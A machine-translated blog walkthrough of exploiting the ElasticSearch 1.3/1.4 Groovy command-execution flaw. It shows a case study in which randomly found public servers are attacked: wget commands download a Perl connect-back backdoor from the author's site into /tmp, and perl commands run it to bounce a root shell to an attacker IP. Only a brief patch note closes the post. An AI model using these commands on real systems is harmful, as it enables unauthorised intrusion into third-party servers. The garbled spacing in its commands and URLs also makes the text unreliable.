ElasticSearch command execution vulnerability: rebound shell through perl

ElasticSearch command execution vulnerability: rebound shell through perl

ElasticSearch is a Lucene-based search server. It provides a distributed full-text search engine with multi-user capabilities, based on RESTful web interfaces. Elasticsearch is developed in Java and released as an open source code under the Apache license terms. It is the second most popular enterprise search engine. Designed for cloud computing, it can achieve real-time search, stable, reliable, fast, and easy to install and use. Currently, Elasticsearch is deployed on a public network with tens of thousands of servers, and there are countless internal network deployments. Elasticsearch uses two dangerous scripts: MVEL and Groovy. In May 2014, MVEL came out with the command execution vulnerability. This time it was Groovy's turn. Elasticsearch 1.3.0-1.3.7 and 1.4.0-1.4.2 have the Groovy Script Engine Vulnerability. This vulnerability allows attackers to construct Groovy scripts to bypass the sandbox check and execute shell commands. The fixed versions are Elasticsearch 1.3.8 and 1.4.3. This vulnerability is no less than the Java Struct command execution vulnerability. It is applicable to both Linux and Windows platforms. In actual tests, it is also authorized to have the highest root or system permissions, attackers can obtain webshell and the highest system permissions.

Affected Versions:

Cpe:/a: elasticsearch: 1.4.2

Cpe:/a: elasticsearch: 1.4.0

Cpe:/a: elasticsearch: 1.3.7

Cpe:/a: elasticsearch: 1.4.0: beta1

Cpe:/a: elasticsearch: 1.4.1

(1) POC available

Destination Address http://www.antian365.com: 9200/_ search? Pretty

POST submit the following data

(2) perl can use poc code

Save the following code as ElasticSearch. py and run the python ElasticSearch. py http://www.antian365.com: 9200/"cat/etc/issue" command. You need to execute other commands to replace the "cat/etc/issue" command.

(3) how to use the perl script to obtain the permission on the 0day

You need to prepare a pl bounce script on the public IP address, such as back. pl. You can upload the script file as a jpg file to the website and download it. For example, www.antian365.com/lab/linux0day/back.pl.txt. Then, execute the following commands in sequence.

Note:

(1) www.antian365.com is the IP address or domain name of the attacked target. The IP address 123.123.123.123 is an independent public IP address, and port 80 is not open to the server.

(2) Some servers may fail to execute commands because the perl environment is not installed.

(4) case studies

 

(1) Search for the target object

 

Through logging? Q = ElasticSearch & t = host to obtain the result. The distribution of the software in each country is displayed in the result. Select an IP address randomly. In this example, select the first IP address http: // 192.241.225.207/, and click the connection address in the upper-right corner of the IP address, for example, open the address http: // 192.241.225.207: 9200.

Figure 1 target object search

(2) execute commands

Directly execute python ElasticSearch. py http: // 192.241.225.207/"/usr/bin/wget www.antian365.com/lab/linux0day/back.pl.txt-O/tmp/back. pl "command, but the feedback result is" HTTP Error 500: Internal Server Error ", as shown in 2.

Use the FireFox portable version for testing again. Enter the target address http: // 192.241.225.207: 9200/_ search? Pretty, input in Post data

The result shows 3, indicating that the vulnerability has been fixed or is unavailable.

Figure 2 run the command

Figure 3 test again whether the vulnerability is available

By testing multiple search results, find an IP address that still has a vulnerability, and execute the following code at the first time of 0-day, no results show that the file is successfully downloaded to the local service.

Python ElasticSearch. py http: // 192.241.222.40: 9200/"/usr/bin/wget www.antian365.com/lab/linux0day/back.pl.txt-O/tmp/back. pl"

Run the following command. "Perl Connect-back Backdoor, Auther: Maple-x" is displayed, indicating that the shell is successfully executed, as shown in 4.

Python ElasticSearch. py http: // 192.241.222.40: 9200/"/usr/bin/perl/tmp/back. pl 124.123.122.11 80"

In a few seconds, the local listening port will bounce the shell back and execute the ifconfig Command, as shown in Figure 5. Check that the shell is successfully rebounded and the intruders will take advantage of the subsequent operations!

 

Figure 4 reverse shell command successful

Figure 5 shell retrieved successfully

(5) Solution

We recommend that you Update to the latest version. If you do not want to upgrade the elasticseach. yml script. groovy. sandbox. enabled is set to false.